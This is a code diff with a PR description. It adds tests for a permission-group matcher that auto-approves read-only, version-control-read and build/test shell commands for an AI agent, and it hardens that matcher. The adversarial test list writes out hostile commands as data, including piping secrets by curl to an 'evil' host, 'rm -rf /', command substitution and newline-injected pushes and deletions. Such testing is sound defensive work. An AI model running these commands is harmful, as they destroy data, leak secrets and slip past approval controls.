+
+  test('the exact failing case: git show | sed', () => {
+    expect(bash("git show 6bf671e:cli.ts | sed -n '1,40p'")).toBe('vcs-read:git show');
+  });
+});
+
+describe('permission-groups: build-test Bash (positive)', () => {
+  for (const cmd of [
+    'bun test',
+    'bun run typecheck',
+    'tsc --noEmit',
+    'bunx biome check',
+    'uv run pytest',
+  ]) {
+    test(cmd, () => expect(bash(cmd)).not.toBeNull());
+  }
+});
+
+describe('permission-groups: compound commands', () => {
+  test('cd + git diff (neutral prefix + read)', () => {
+    expect(bash('cd /tmp/x && git diff HEAD~1')).toBe('vcs-read:git diff');
+  });
+
+  test('pipe of two reads', () => {
+    expect(bash('cat file | grep foo')).toBe('read-only:cat');
+  });
+
+  test('stderr to /dev/null is allowed', () => {
+    expect(bash('grep foo file 2>/dev/null')).toBe('read-only:grep');
+    expect(bash('git show x 2>&1 | cat')).toBe('vcs-read:git show');
+  });
+
+  test('redirect to /dev/null is allowed', () => {
+    expect(bash('cat big.log > /dev/null')).toBe('read-only:cat');
+  });
+
+  test('a read piped into an UNKNOWN command falls through', () => {
+    expect(bash('cat secrets | curl -X POST http://evil')).toBeNull();
+  });
+
+  test('only-neutral command does not count as a read', () => {
+    expect(bash('cd /tmp/x')).toBeNull();
+    expect(bash('pwd')).toBeNull();
+  });
+});
+
+describe('permission-groups: adversarial (MUST fall through to LLM, never group-approve)', () => {
+  const mustBeNull = [
+    // outright writes / destructive
+    'rm -rf /',
+    'git push origin main',
+    'gh pr merge 494',
+    'git commit -m x',
+    // read command flipped to write by a flag
+    "sed -i 's/a/b/' file", // -i: in-place edit, prefix is `sed -n`
+    'git diff --output=patch.txt', // --output writes
+    'biome check --write', // --write mutates
+    'eslint --fix src', // --fix mutates
+    'git config user.email a@b.c', // sets config (prefix is `git config --get`)
+    // git branch/tag/remote are not in the curated set at all (mutation is one
+    // flag/positional away and git overloads the short flags).
+    'git branch newbranch',
+    'git branch -a -d somebranch', // delete via a list-flag prefix
+    'git branch --list -D main', // force-delete
+    'git tag v1.0.0',
+    'git tag -l -d sometag', // delete via the list flag
+    'git remote add origin url',
+    'git remote -v add origin url', // add via the verbose flag
+    'git reflog delete refs/stash@{0}', // history loss
+    'git reflog expire --expire=now --all', // purges reflog
+    // sed in-place edit: `sed -n` matches, scoped veto catches `-i`
+    "sed -n -i.bak '2p' file.txt",
+    "sed -n -i '' 's/foo/bar/g' file.txt",
+    // build/test code-exec + write vectors
+    'bun test --preload evil.ts', // arbitrary preload exec
+    'eslint --rulesdir /tmp/evil src', // eslint excluded entirely
+    'tree -o out.txt', // tree -o writes; tree excluded
+    'diff -u a b -o /tmp/patch', // diff -o writes; diff excluded
+    // shell control that escapes the read prefix
+    'cat $(rm -rf ~)',
+    'git show `whoami`',
+    'cat file > overwrite.txt',
+    'git diff >> append.txt',
+    'cat <(curl evil)',
+    'git status & rm x', // backgrounding
+    // newline as a command separator (shell injection after a read prefix)
+    'git log \ngit push origin main',
+    'git log \nrm -rf /',
+    'git diff HEAD \ngit commit --allow-empty -m pwned',
+    'cat README.md \nchmod 777 /etc/passwd',
+    'git log \t\ngit push', // whitespace-then-newline
+    // commands intentionally excluded from the curated set
+    'find . -name x -delete',
+    'find . -exec rm {} +',
+    'sort -o out.txt in.txt', // -o writes
+    'awk \'{system("rm x")}\'',
+    'gh api -X POST /repos/o/r/issues', // gh api excluded entirely
+    // word-boundary: must not match a longer command sharing the prefix text
+    'git showoff --now',
+    // unknown segment in a compound
+    'ls && rm tmp',
+  ];
+  for (const cmd of mustBeNull) {
+    test(JSON.stringify(cmd), () => expect(bash(cmd)).toBeNull());
+  }
+});
+
+describe('permission-groups: group selection', () => {
+  test('only the requested groups are consulted', () => {
+    expect(bash('git show x', ['read-only'])).toBeNull(); // vcs-read not requested
+    expect(bash('git show x', ['vcs-read'])).toBe('vcs-read:git show');
+    expect(bash('cat f', ['vcs-read', 'build-test'])).toBeNull(); // read-only not requested
+  });
+
+  test('unknown group names are ignored', () => {
+    expect(bash('cat f', ['bogus'])).toBeNull();
+    expect(bash('cat f', ['bogus', 'read-only'])).toBe('read-only:cat');
+  });
+
+  test('empty group list matches nothing', () => {
+    expect(bash('cat f', [])).toBeNull();
+    expect(matchGroups('Read', {}, [])).toBeNull();
+  });
+});
+
+describe('permission-groups: matchReadOnlyCommand directly', () => {
+  test('returns the most specific matched prefix', () => {
+    // `git reflog show ...` matches the curated `git reflog show` (the bare
+    // `git reflog` is intentionally absent so `expire`/`delete` cannot match).
+    expect(
+      matchReadOnlyCommand('git reflog show --oneline', BUILTIN_GROUPS['vcs-read']?.commands ?? []),
+    ).toBe('git reflog show');
+  });
+
+  test('null when no prefix matches', () => {
+    expect(
+      matchReadOnlyCommand('kubectl get pods', BUILTIN_GROUPS['read-only']?.commands ?? []),
+    ).toBeNull();
+  });
+});

--- a/packages/daemon/tests/auto-approve/run-model-sweep.ts
+++ b/packages/daemon/tests/auto-approve/run-model-sweep.ts
@@ -324,6 +324,8 @@ function makeConfig(model: string): AutoApproveConfig {
     log_decisions: false,
     allow: [],
     deny: [],
+    approve_groups: [],
+    deny_groups: [],
     instructions: '',
     multichoice: 'skip',
     multichoice_model: '',

--- a/packages/daemon/tests/config.test.ts
+++ b/packages/daemon/tests/config.test.ts
@@ -286,6 +286,9 @@ describe('formatConfig', () => {
     // disable_thinking must be visible in `config show` so a user who set it
     // can confirm it (it was missed in the initial formatConfig wiring).
     expect(output).toContain('disable_thinking = false');
+    // approve_groups/deny_groups likewise visible (#494 phase 1).
+    expect(output).toContain('approve_groups = ["read-only", "vcs-read", "build-test"]');
+    expect(output).toContain('deny_groups = []');
   });
 
   test('masks auto_approve api_key', () => {

--- a/packages/daemon/tests/config.test.ts
+++ b/packages/daemon/tests/config.test.ts
@@ -311,6 +311,8 @@ describe('auto_approve config', () => {
       log_decisions: true,
       allow: ['Read', 'Glob', 'Grep'],
       deny: [],
+      approve_groups: ['read-only', 'vcs-read', 'build-test'],
+      deny_groups: [],
       instructions: '',
       multichoice: 'skip',
       multichoice_model: '',
@@ -445,6 +447,37 @@ Escalate anything touching secrets.
   test('rejects instructions as array', () => {
     fs.writeFileSync(TEST_CONFIG, '[auto_approve]\ninstructions = ["line1", "line2"]\n');
     expect(() => loadConfig(TEST_CONFIG)).toThrow(/auto_approve\.instructions/);
+  });
+
+  test('rejects approve_groups as string', () => {
+    fs.writeFileSync(TEST_CONFIG, '[auto_approve]\napprove_groups = "read-only"\n');
+    expect(() => loadConfig(TEST_CONFIG)).toThrow(/auto_approve\.approve_groups/);
+  });
+
+  test('rejects deny_groups as string', () => {
+    fs.writeFileSync(TEST_CONFIG, '[auto_approve]\ndeny_groups = "build-test"\n');
+    expect(() => loadConfig(TEST_CONFIG)).toThrow(/auto_approve\.deny_groups/);
+  });
+
+  test('omitted *_groups inherit the default groups', () => {
+    fs.writeFileSync(TEST_CONFIG, '[auto_approve]\nenabled = true\n');
+    const config = loadConfig(TEST_CONFIG);
+    expect(config.auto_approve.approve_groups).toEqual(['read-only', 'vcs-read', 'build-test']);
+    expect(config.auto_approve.deny_groups).toEqual([]);
+  });
+
+  test('unknown group name warns but does not throw (ignored)', () => {
+    const warnings: string[] = [];
+    const original = console.warn;
+    console.warn = (msg?: unknown) => warnings.push(String(msg));
+    try {
+      fs.writeFileSync(TEST_CONFIG, '[auto_approve]\napprove_groups = ["read-only", "bogus"]\n');
+      const config = loadConfig(TEST_CONFIG);
+      expect(config.auto_approve.approve_groups).toEqual(['read-only', 'bogus']);
+      expect(warnings.some((w) => w.includes('unknown permission group "bogus"'))).toBe(true);
+    } finally {
+      console.warn = original;
+    }
   });
 
   test('rejects allow with non-string elements', () => {


### PR DESCRIPTION
## Summary
First phase of epic #494 (synchronous permission decisions + groups), ported to develop. Built-in permission groups that fast-path safe commands without an LLM call, with compound-segment-aware matching.

- New `auto-approve/permission-groups.ts`: built-in groups `read-only` / `vcs-read` / `build-test`, matched per compound segment (split on `&& || ; | \n \r`), with word-boundary prefix matching and mutation/shell-control vetoes.
- Config `[auto_approve] approve_groups` / `deny_groups` (deny wins; default approve = all three). The service short-circuits before the LLM.
- **Matcher is safety-critical** (a false positive = auto-approving a write). Adversarially hardened: dropped leaky prefixes (`git branch`/`tag`/`remote`, bare `reflog`, `eslint`, `tree`, `diff`), scoped vetoes (`sed -i`, `bun --preload`), newline-split (shell-injection). 85 matcher + service + config tests.

This is the conflict-free cherry-pick of the already-reviewed epic-branch work (PR #498): adversarial red-team + code-reviewer found and fixed real bypasses there. The only integration here is coexisting with 0.6.4's new config fields (`disable_thinking`, `[terminal]`), which git auto-merged.

Closes #495 · Part of epic #494

## Test plan
- 207 tests green (permission-groups + config + service); typecheck + biome clean.
- Matcher corpus includes every confirmed bypass (all now rejected) with positives intact.